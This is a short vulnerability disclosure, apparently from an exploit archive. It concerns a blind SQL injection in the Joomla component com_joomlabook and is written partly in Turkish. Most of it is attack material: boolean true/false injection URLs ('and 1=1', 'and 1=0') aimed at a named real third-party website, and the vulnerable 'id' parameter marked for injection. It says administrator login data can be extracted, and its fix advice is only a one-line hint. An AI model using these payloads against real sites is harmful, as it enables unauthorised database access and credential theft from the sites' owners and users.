<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN

# Script Name : Joomla Component com_joomlabook Blind SQL injection Vulnerability

# Bug Type : SqL Injections

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. :

TRUE(+)
» http://new.paho.org/hq/index.php?option=com_joomlabook&Itemid=259&task=display&id=162 and 1=1
FALSE(-)
» http://new.paho.org/hq/index.php?option=com_joomlabook&Itemid=259&task=display&id=162 and 1=0

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

?option=com_joomlabook&Itemid=259&task=display&id=[Blind SqL Inj.]

< -- bug code end of -- >